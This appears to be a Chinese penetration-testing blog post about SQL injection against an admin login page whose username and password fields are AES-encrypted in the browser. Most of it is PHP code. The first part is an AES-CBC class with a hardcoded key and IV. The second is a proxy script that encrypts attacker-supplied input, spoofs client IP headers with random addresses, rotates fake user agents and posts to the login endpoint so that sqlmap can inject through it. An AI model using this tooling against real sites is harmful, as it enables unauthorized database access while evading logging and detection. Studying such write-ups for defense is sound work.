0x01 概要
站点:http://aa.test.com:8088/Admin/Login
这样看起来是一个挺正常的界面,测试一下发现存在注入
很清楚的可以看到两张图片是有明显的区别的,说明有注入
抓包时发现!!!!
0x02 查看前端加密方式
前端加密的话,那就只需要找到对应前端加密脚本即可
0x03 编码对应解密脚本
# AES 加解密脚本<?php/*** AES/CBC/PKCS5Padding模式 加密解密*/class Crypt {/*** [$cipher 加密模式]* @var [type]*/private $cipher = MCRYPT_RIJNDAEL_128;private $mode = MCRYPT_MODE_CBC;/*** [$key 密匙]* @var string*/private $secret_key = '123456789ABCDEFG123456789ABCDEFG';/*** [$iv 偏移量]* @var string*/private $iv = '123456789ABCDEFG';function setCipher($cipher=''){$cipher && $this->cipher = $cipher;}function setMode($mode=''){$mode && $this->mode = $mode;}function setSecretKey($secret_key=''){$secret_key && $this->secret_key = $secret_key;}function setIv($iv=''){$iv && $this->iv = $iv;}//加密function encrypt($str){$size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );$str = $this->pkcs5Pad ( $str, $size );$data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);//bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值$data=strtolower(bin2hex($data));return $data;}//解密function decrypt($str){$str = $this->hex2bin( strtolower($str));$str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );$str = $this->pkcs5Unpad( $str );return $str;}//bin2hex还原private function hex2bin($hexData){$binData = "";for($i = 0; $i < strlen ( $hexData ); $i += 2){$binData .= chr(hexdec(substr($hexData, $i, 2)));}return $binData;}//PKCS5Paddingprivate function pkcs5Pad($text, $blocksize){$pad = $blocksize - (strlen ( $text ) % $blocksize);return $text . str_repeat ( chr ( $pad ), $pad );}private function pkcs5Unpad($text){$pad = ord ( $text {strlen ( $text ) - 1} );if ($pad > strlen ( $text ))return false;if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)return false;return substr ( $text, 0, - 1 * $pad );}}echo (new Crypt())->encrypt('111');
可以看得到一致的,那就可以正常注入了
# 注入脚本<?php/*** AES/CBC/PKCS5Padding模式 加密解密*/class Crypt {/*** [$cipher 加密模式]* @var [type]*/private $cipher = MCRYPT_RIJNDAEL_128;private $mode = MCRYPT_MODE_CBC;/*** [$key 密匙]* @var string*/private $secret_key = '123456789ABCDEFG123456789ABCDEFG';/*** [$iv 偏移量]* @var string*/private $iv = '123456789ABCDEFG';function setCipher($cipher=''){$cipher && $this->cipher = $cipher;}function setMode($mode=''){$mode && $this->mode = $mode;}function setSecretKey($secret_key=''){$secret_key && $this->secret_key = $secret_key;}function setIv($iv=''){$iv && $this->iv = $iv;}//加密function encrypt($str){$size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );$str = $this->pkcs5Pad ( $str, $size );$data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);//bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值$data=strtolower(bin2hex($data));return $data;}//解密function decrypt($str){$str = $this->hex2bin( strtolower($str));$str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );$str = $this->pkcs5Unpad( $str );return $str;}//bin2hex还原private function hex2bin($hexData){$binData = "";for($i = 0; $i < strlen ( $hexData ); $i += 2){$binData .= chr(hexdec(substr($hexData, $i, 2)));}return $binData;}//PKCS5Paddingprivate function pkcs5Pad($text, $blocksize){$pad = $blocksize - (strlen ( $text ) % $blocksize);return $text . str_repeat ( chr ( $pad ), $pad );}private function pkcs5Unpad($text){$pad = ord ( $text {strlen ( $text ) - 1} );if ($pad > strlen ( $text ))return false;if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)return false;return substr ( $text, 0, - 1 * $pad );}}class SqlCurl{public function curlRequest($url, $post = [], $cookie = '', $referurl = ''){if (!$referurl) {$referurl = 'https://www.baidu.com';}$header = array('CLIENT-IP:' . $this->getIp(),'X-FORWARDED-FOR:' . $this->getIp(),'HTTP_CLIENT_IP:' .$this->getIp(),'HTTP_X_FORWARDED_FOR' . $this->getIp(),'REMOTE_ADDR:' . $this->getIp(),'Content-Type:application/x-www-form-urlencoded','X-Requested-With:XMLHttpRequest',);$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);//随机浏览器useragentcurl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($curl, CURLOPT_AUTOREFERER, 1);curl_setopt($curl, CURLOPT_REFERER, $referurl);curl_setopt($curl, CURLOPT_HTTPHEADER, $header);if ($post) {curl_setopt($curl, CURLOPT_POST, 1);curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));}if ($cookie) {curl_setopt($curl, CURLOPT_COOKIE, $cookie);}curl_setopt($curl, CURLOPT_TIMEOUT, 10);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);$data = curl_exec($curl);if (curl_errno($curl)) {return curl_error($curl);}curl_close($curl);return $data;}private function getIp(){return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);}private function agentArry(){$agentarry = [//PC端的UserAgent"safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11","safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50","Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0","IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko","IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0","IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)","IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)","IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)","Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1","Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11","Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11","Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11","傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)","腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)","世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)","世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)","360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)","搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)","Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)","Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",//移动端口"safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5","safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5","safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5","Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1","Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1","Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10","Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13","BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+","WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0","UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999","UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999","UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999","微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",];return $agentarry[array_rand($agentarry, 1)];}}// http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#$data['UserName'] = (new Crypt())->encrypt($_GET['UserName']);$data['Password'] = (new Crypt())->encrypt($_GET['Password']);echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);
0x04 Sqlmap正常注入
若有收获,就点个赞吧
0 人点赞
